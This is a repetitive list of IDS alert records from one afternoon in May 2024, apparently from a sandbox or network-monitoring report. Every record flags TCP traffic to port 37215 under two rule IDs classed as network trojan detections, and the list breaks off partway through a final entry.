                Timestamp:05/29/24-15:16:16.716209
                SID:2829579
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533198
                SID:2835222
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262118
                SID:2829579
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855786
                SID:2835222
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848907
                SID:2829579
                Source Port:58180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140985
                SID:2835222
                Source Port:39016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176657
                SID:2829579
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629897
                SID:2835222
                Source Port:50012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711925
                SID:2835222
                Source Port:59496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620240
                SID:2835222
                Source Port:58576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663461
                SID:2835222
                Source Port:55740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226634
                SID:2829579
                Source Port:43272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989861
                SID:2829579
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374159
                SID:2829579
                Source Port:37484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520906
                SID:2835222
                Source Port:54334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944722
                SID:2829579
                Source Port:60908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973355
                SID:2829579
                Source Port:41374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325512
                SID:2835222
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714393
                SID:2835222
                Source Port:37970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374703
                SID:2835222
                Source Port:50364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177996
                SID:2829579
                Source Port:52988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944597
                SID:2829579
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562144
                SID:2835222
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668924
                SID:2829579
                Source Port:40270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417996
                SID:2835222
                Source Port:51374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.578972
                SID:2835222
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893792
                SID:2829579
                Source Port:54100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359535
                SID:2829579
                Source Port:50438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990828
                SID:2835222
                Source Port:43790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664179
                SID:2829579
                Source Port:56992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820532
                SID:2829579
                Source Port:35372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864237
                SID:2829579
                Source Port:55166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331667
                SID:2829579
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189692
                SID:2829579
                Source Port:44350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614382
                SID:2835222
                Source Port:48550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023285
                SID:2829579
                Source Port:58206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914864
                SID:2835222
                Source Port:41448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074639
                SID:2835222
                Source Port:35776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279213
                SID:2835222
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559765
                SID:2835222
                Source Port:47416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975163
                SID:2829579
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897928
                SID:2829579
                Source Port:35410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420987
                SID:2829579
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672626
                SID:2835222
                Source Port:44682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887918
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929135
                SID:2835222
                Source Port:33072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519331
                SID:2829579
                Source Port:58942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667354
                SID:2835222
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165263
                SID:2829579
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869401
                SID:2835222
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716186
                SID:2835222
                Source Port:42102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322970
                SID:2829579
                Source Port:60810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586063
                SID:2835222
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517866
                SID:2835222
                Source Port:55244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872817
                SID:2835222
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659061
                SID:2835222
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076145
                SID:2835222
                Source Port:56534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557564
                SID:2835222
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076122
                SID:2835222
                Source Port:57980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319597
                SID:2829579
                Source Port:54230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339182
                SID:2835222
                Source Port:55482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422289
                SID:2835222
                Source Port:47180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265671
                SID:2829579
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660272
                SID:2829579
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615144
                SID:2835222
                Source Port:55174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653964
                SID:2835222
                Source Port:55278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967223
                SID:2829579
                Source Port:36240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840308
                SID:2829579
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868075
                SID:2835222
                Source Port:58084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277095
                SID:2835222
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653086
                SID:2829579
                Source Port:58690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557007
                SID:2829579
                Source Port:56902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441217
                SID:2829579
                Source Port:39600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716116
                SID:2829579
                Source Port:44818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701066
                SID:2835222
                Source Port:44388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526079
                SID:2835222
                Source Port:52236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979626
                SID:2829579
                Source Port:36132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163812
                SID:2835222
                Source Port:35496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816977
                SID:2829579
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809365
                SID:2835222
                Source Port:37714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236254
                SID:2829579
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207916
                SID:2829579
                Source Port:41114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613103
                SID:2829579
                Source Port:33020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817220
                SID:2829579
                Source Port:33192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790554
                SID:2829579
                Source Port:42900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763630
                SID:2835222
                Source Port:46932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762924
                SID:2835222
                Source Port:59846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268462
                SID:2829579
                Source Port:34784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843057
                SID:2829579
                Source Port:39010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381201
                SID:2835222
                Source Port:38974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783079
                SID:2829579
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765611
                SID:2829579
                Source Port:56476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841773
                SID:2835222
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135811
                SID:2835222
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669541
                SID:2835222
                Source Port:39562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240387
                SID:2829579
                Source Port:42660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583766
                SID:2829579
                Source Port:43236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172961
                SID:2829579
                Source Port:47432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728665
                SID:2829579
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868751
                SID:2829579
                Source Port:40924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325696
                SID:2835222
                Source Port:56508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417900
                SID:2835222
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271675
                SID:2835222
                Source Port:38228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.976010
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177147
                SID:2835222
                Source Port:45952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.271582
                SID:2829579
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419910
                SID:2829579
                Source Port:46680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731902
                SID:2829579
                Source Port:33546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434426
                SID:2829579
                Source Port:57700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320561
                SID:2835222
                Source Port:33380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796089
                SID:2835222
                Source Port:37228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801290
                SID:2835222
                Source Port:58306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965317
                SID:2835222
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015899
                SID:2835222
                Source Port:33662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687969
                SID:2829579
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766861
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282862
                SID:2829579
                Source Port:39064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337116
                SID:2835222
                Source Port:49014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655935
                SID:2829579
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766848
                SID:2829579
                Source Port:58096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325066
                SID:2835222
                Source Port:47948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328126
                SID:2835222
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415076
                SID:2835222
                Source Port:35014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712885
                SID:2829579
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318064
                SID:2829579
                Source Port:42606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385196
                SID:2829579
                Source Port:53554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321387
                SID:2835222
                Source Port:51330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908732
                SID:2829579
                Source Port:38782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666507
                SID:2835222
                Source Port:41276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968661
                SID:2829579
                Source Port:45276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786744
                SID:2835222
                Source Port:55008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.072591
                SID:2835222
                Source Port:33134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900089
                SID:2829579
                Source Port:53516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233600
                SID:2829579
                Source Port:46716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788378
                SID:2835222
                Source Port:51310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859519
                SID:2835222
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171018
                SID:2829579
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462942
                SID:2835222
                Source Port:33864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332479
                SID:2835222
                Source Port:33942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421118
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786937
                SID:2835222
                Source Port:60912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281967
                SID:2835222
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441442
                SID:2829579
                Source Port:40598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823347
                SID:2835222
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032924
                SID:2835222
                Source Port:55040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660457
                SID:2835222
                Source Port:41906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853344
                SID:2829579
                Source Port:41776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330136
                SID:2829579
                Source Port:48810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228561
                SID:2829579
                Source Port:54778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273707
                SID:2829579
                Source Port:51624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579989
                SID:2835222
                Source Port:45246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041342
                SID:2835222
                Source Port:52514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860231
                SID:2835222
                Source Port:38500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885551
                SID:2829579
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962227
                SID:2835222
                Source Port:60802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883086
                SID:2835222
                Source Port:58648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221209
                SID:2835222
                Source Port:39160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375290
                SID:2835222
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141477
                SID:2829579
                Source Port:53818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262116
                SID:2829579
                Source Port:51926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420525
                SID:2835222
                Source Port:46720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075249
                SID:2835222
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105203
                SID:2835222
                Source Port:41916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734769
                SID:2829579
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730676
                SID:2829579
                Source Port:49568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715868
                SID:2835222
                Source Port:50776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428440
                SID:2835222
                Source Port:51736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262004
                SID:2829579
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550589
                SID:2829579
                Source Port:34060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688251
                SID:2835222
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265893
                SID:2835222
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630474
                SID:2829579
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069966
                SID:2835222
                Source Port:34222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659922
                SID:2835222
                Source Port:45088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629663
                SID:2829579
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843240
                SID:2835222
                Source Port:40224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.730651
                SID:2835222
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315854
                SID:2829579
                Source Port:56476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498147
                SID:2829579
                Source Port:56738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583753
                SID:2835222
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221439
                SID:2829579
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973245
                SID:2835222
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173856
                SID:2829579
                Source Port:56962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593643
                SID:2835222
                Source Port:53858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270360
                SID:2829579
                Source Port:39826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324628
                SID:2829579
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227112
                SID:2835222
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848808
                SID:2835222
                Source Port:36984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163775
                SID:2829579
                Source Port:50678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.363976
                SID:2829579
                Source Port:59500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575513
                SID:2829579
                Source Port:35928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039353
                SID:2835222
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833410
                SID:2829579
                Source Port:44910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889894
                SID:2829579
                Source Port:33026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666989
                SID:2835222
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669444
                SID:2829579
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845675
                SID:2835222
                Source Port:40996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899343
